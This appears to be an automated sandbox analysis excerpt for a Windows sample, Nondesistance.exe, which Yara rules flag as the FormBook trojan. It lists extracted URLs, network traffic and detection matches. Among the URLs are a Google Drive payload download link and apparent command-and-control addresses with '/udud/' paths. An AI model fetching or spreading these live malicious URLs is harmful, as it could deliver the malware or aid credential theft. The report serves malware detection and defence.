        Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000777E000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000697E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://goge8opp.com:301
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006E12000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000006012000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0Lvbc
        Source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: Nondesistance.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: Nondesistance.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://tilda.cc
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://tilda.ws/img/logo404.png
        Source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000626000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006FA4000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000061A4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.mindfreak.live/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25030471443.0000000000648000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.osbornesargent.co.uk
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25030471443.0000000000648000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.osbornesargent.co.uk/udud/
        Source: Nondesistance.exe, 00000009.00000001.20120981057.00000000005F2000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: Nondesistance.exe, 00000009.00000001.20120981057.00000000005F2000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/default.css
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/footer.html
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/header.html
        Source: write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/icon.png
        Source: write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/thumbnail.png
        Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.js
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e957
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e957
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e957
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/1a/1an/1anfpg.css?ph=cb3a78e957
        Source: write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=cb3a78e957
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e957
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/39/396/39634o.js?ph=cb3a78e957
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=cb3a78e957
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=cb3a78e957
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e957
        Source: Nondesistance.exe, 00000009.00000002.20393067767.0000000002168000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Hd
        Source: Nondesistance.exe, 00000009.00000002.20393067767.0000000002168000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/hd
        Source: Nondesistance.exe, 00000009.00000002.20393067767.0000000002168000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm
        Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300938788.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm&export=download
        Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm&export=downloadk
        Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm&export=downloadtW
        Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/x
        Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://events.webnode.com/projects/-/events/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006C80000.00000004.80000000.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/bg/NameSiloLogo.png
        Source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://klientams.iv.lt/
        Source: write.exe, 0000000B.00000002.25029531563.0000000002A4B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.li
        Source: write.exe, 0000000B.00000002.25029531563.0000000002A4B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.lihttps://login.li
        Source: write.exe, 0000000B.00000002.25030469735.0000000002DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: write.exe, 0000000B.00000002.25030469735.0000000002DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: write.exe, 0000000B.00000002.25030469735.0000000002DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: write.exe, 0000000B.00000002.25030469735.0000000002DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
        Source: write.exe, 0000000B.00000002.25030469735.0000000002E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: write.exe, 0000000B.00000003.20563255735.0000000007C02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.liv
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
        Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000072C8000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000064C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=avocatmh.org
        Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000072C8000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000064C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
        Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-542MMSL
        Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/domenai/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/duomenu-centras/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/el-pasto-filtras/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/neribotas-svetainiu-talpinimas/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/profesionalus-hostingas/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/sertifikatai/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/svetainiu-kurimo-irankis/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/talpinimo-planai/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/vps-serveriai/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006C80000.00000004.80000000.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25038661256.00000000078C0000.00000004.00000800.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.namesilo.com
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006C80000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25038661256.00000000078C0000.00000004.00000800.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.namesilo.com/domain/search-domains?query=l7aeh.us
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.namesilo.com/domain/search-domains?query=lm2ue.us
        Source: write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
        Source: write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.valentinaetommaso.it/page-not-found-404/
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnode.com/it/?utm_source=text&amp;utm_medium=footer&amp;utm_content=wnd2&amp;utm_campa
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnode.it/?utm_source=text&utm_medium=footer&utm_content=wnd2&utm_campaign=signature
        Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
        Source: unknownHTTPS traffic detected: 142.251.16.101:443 -> 192.168.11.30:49827 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.253.62.132:443 -> 192.168.11.30:49828 version: TLS 1.2
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,4_2_00405086

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
